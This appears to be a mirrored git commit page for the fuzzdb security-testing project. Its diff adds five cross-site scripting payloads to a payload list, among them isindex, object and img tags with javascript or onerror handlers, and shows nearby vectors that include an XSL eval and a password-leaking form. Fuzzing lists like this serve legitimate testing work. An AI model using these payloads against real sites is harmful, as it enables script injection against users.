mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-22 19:13:09 +00:00
Adding more payloads
This commit is contained in:
parent
510a8547e7
commit
474313e581
1 changed files with 5 additions and 0 deletions
|
@ -134,3 +134,8 @@ XXX<style>*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */<!----><!
|
|||
<xmp><%</xmp><img alt='%></xmp><img src=xx:x onerror=alert(1)//'><script>x='<%'</script> %>/alert(2)</script>XXX<style>*['<!--']{}</style>-->{}*{color:red}</style>
|
||||
<?xml-stylesheet type="text/xsl" href="#" ?><stylesheet xmlns="http://www.w3.org/TR/WD-xsl"><template match="/"><eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval><if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if></template></stylesheet>
|
||||
<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>
|
||||
<isindex type=image src=1 onerror=alert(1)>
|
||||
<isindex action=javascript:alert(1) type=image>
|
||||
<object data="javascript:alert(0)">
|
||||
<img src=x:alert(alt) onerror=eval(src) alt=0>
|
||||
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
|
||||
|
|
Loading…
Reference in a new issue